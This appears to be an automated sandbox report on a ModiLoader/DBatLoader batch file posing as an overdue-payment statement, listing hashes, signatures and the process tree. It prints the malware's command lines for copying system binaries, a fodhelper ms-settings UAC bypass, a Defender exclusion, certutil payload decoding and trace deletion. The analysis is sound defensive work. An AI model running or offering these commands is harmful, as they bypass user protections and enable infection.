Analysis
-
max time kernel
144s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25-03-2024 14:32
Static task
static1
Behavioral task
behavioral1
Sample
Statement Of Account - Overdue Payments #94839540823489.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Statement Of Account - Overdue Payments #94839540823489.bat
Resource
win10v2004-20240226-en
General
-
Target
Statement Of Account - Overdue Payments #94839540823489.bat
-
Size
2.9MB
-
MD5
0acc894a421b72f77d8f825865710ec4
-
SHA1
e51bfe768ece4a254a5f85c977fa65dfa963c3b8
-
SHA256
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
-
SHA512
4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
-
SSDEEP
24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/1832-51-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 -
Executes dropped EXE 16 IoCs
pid Process 3068 alpha.exe 2672 alpha.exe 2544 alpha.exe 2636 xkn.exe 2384 alpha.exe 2284 alpha.exe 2988 kn.exe 2232 alpha.exe 2128 kn.exe 1832 Lewxa.com 2596 alpha.exe 2476 alpha.exe 2616 alpha.exe 2692 alpha.exe 2768 alpha.exe 1852 alpha.exe -
Loads dropped DLL 9 IoCs
pid Process 2156 cmd.exe 2156 cmd.exe 2156 cmd.exe 2544 alpha.exe 2636 xkn.exe 2636 xkn.exe 2284 alpha.exe 780 WerFault.exe 780 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 780 1832 WerFault.exe 43 -
Kills process with taskkill 2 IoCs
pid Process 2196 taskkill.exe 1612 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2400 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1832 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2636 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2636 xkn.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2156 wrote to memory of 3016 2156 cmd.exe 29 PID 2156 wrote to memory of 3016 2156 cmd.exe 29 PID 2156 wrote to memory of 3016 2156 cmd.exe 29 PID 3016 wrote to memory of 2996 3016 cmd.exe 30 PID 3016 wrote to memory of 2996 3016 cmd.exe 30 PID 3016 wrote to memory of 2996 3016 cmd.exe 30 PID 2156 wrote to memory of 3068 2156 cmd.exe 31 PID 2156 wrote to memory of 3068 2156 cmd.exe 31 PID 2156 wrote to memory of 3068 2156 cmd.exe 31 PID 3068 wrote to memory of 2496 3068 alpha.exe 32 PID 3068 wrote to memory of 2496 3068 alpha.exe 32 PID 3068 wrote to memory of 2496 3068 alpha.exe 32 PID 2156 wrote to memory of 2672 2156 cmd.exe 33 PID 2156 wrote to memory of 2672 2156 cmd.exe 33 PID 2156 wrote to memory of 2672 2156 cmd.exe 33 PID 2672 wrote to memory of 2712 2672 alpha.exe 34 PID 2672 wrote to memory of 2712 2672 alpha.exe 34 PID 2672 wrote to memory of 2712 2672 alpha.exe 34 PID 2156 wrote to memory of 2544 2156 cmd.exe 35 PID 2156 wrote to memory of 2544 2156 cmd.exe 35 PID 2156 wrote to memory of 2544 2156 cmd.exe 35 PID 2544 wrote to memory of 2636 2544 alpha.exe 36 PID 2544 wrote to memory of 2636 2544 alpha.exe 36 PID 2544 wrote to memory of 2636 2544 alpha.exe 36 PID 2636 wrote to memory of 2384 2636 xkn.exe 37 PID 2636 wrote to memory of 2384 2636 xkn.exe 37 PID 2636 wrote to memory of 2384 2636 xkn.exe 37 PID 2384 wrote to memory of 2400 2384 alpha.exe 38 PID 2384 wrote to memory of 2400 2384 alpha.exe 38 PID 2384 wrote to memory of 2400 2384 alpha.exe 38 PID 2156 wrote to memory of 2284 2156 cmd.exe 39 PID 2156 wrote to memory of 2284 2156 cmd.exe 39 PID 2156 wrote to memory of 2284 2156 cmd.exe 39 PID 2284 wrote to memory of 2988 2284 alpha.exe 40 PID 2284 wrote to memory of 2988 2284 alpha.exe 40 PID 2284 wrote to memory of 2988 2284 alpha.exe 40 PID 2156 wrote to memory of 2232 2156 cmd.exe 41 PID 2156 wrote to memory of 2232 2156 cmd.exe 41 PID 2156 wrote to memory of 2232 2156 cmd.exe 41 PID 2232 wrote to memory of 2128 2232 alpha.exe 42 PID 2232 wrote to memory of 2128 2232 alpha.exe 42 PID 2232 wrote to memory of 2128 2232 alpha.exe 42 PID 2156 wrote to memory of 1832 2156 cmd.exe 43 PID 2156 wrote to memory of 1832 2156 cmd.exe 43 PID 2156 wrote to memory of 1832 2156 cmd.exe 43 PID 2156 wrote to memory of 1832 2156 cmd.exe 43 PID 2156 wrote to memory of 2596 2156 cmd.exe 44 PID 2156 wrote to memory of 2596 2156 cmd.exe 44 PID 2156 wrote to memory of 2596 2156 cmd.exe 44 PID 2156 wrote to memory of 2476 2156 cmd.exe 45 PID 2156 wrote to memory of 2476 2156 cmd.exe 45 PID 2156 wrote to memory of 2476 2156 cmd.exe 45 PID 2156 wrote to memory of 2616 2156 cmd.exe 46 PID 2156 wrote to memory of 2616 2156 cmd.exe 46 PID 2156 wrote to memory of 2616 2156 cmd.exe 46 PID 2156 wrote to memory of 2692 2156 cmd.exe 47 PID 2156 wrote to memory of 2692 2156 cmd.exe 47 PID 2156 wrote to memory of 2692 2156 cmd.exe 47 PID 2156 wrote to memory of 2768 2156 cmd.exe 48 PID 2156 wrote to memory of 2768 2156 cmd.exe 48 PID 2156 wrote to memory of 2768 2156 cmd.exe 48 PID 2768 wrote to memory of 2196 2768 alpha.exe 49 PID 2768 wrote to memory of 2196 2768 alpha.exe 49 PID 2768 wrote to memory of 2196 2768 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:2996
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:2496
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2712
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:2400
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2988
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2128
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 7323⤵
- Loads dropped DLL
- Program crash
PID:780
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2596
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2476
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2616
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2692
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:1852 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5cde0e4350f0886229b0a605810fbe397
SHA12ebdce74856c9e858064bbf53b2c8c46c20a58da
SHA256f577452dfa0c5aab1f574fd66e8c4430687731ad062916f0b7db09189dede263
SHA512c9f15d848b499325e6a4185416af67a41cbec16884d726244bc638e52928744dc91092eaab91e224ecbf4895342c95c6ca97c8002eecc298c2ee75e0bf5c000c
-
Filesize
1.0MB
MD5701a1b8de275a64ad562d862d7e117d4
SHA1a6dcd9f802a20fa07bd2f569b0761244ab5803a7
SHA256f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad
SHA512085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
320KB
MD5f6fe65344df960957a4d3d597957e7b5
SHA117855b7bb38ae0605e3c4bdb1785c4015018bc52
SHA2569d1baf573160f751ed8fe64e881b52a320ae3a105348bd4746e72301cf0948dd
SHA51278df37611422ca5226bd72d954005d7b8e843c94ae4cdffa7025135816b25700e01838e2ff98af9e8714f3cc8eefcd8a22bf2790789aca57182dccae62147574
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2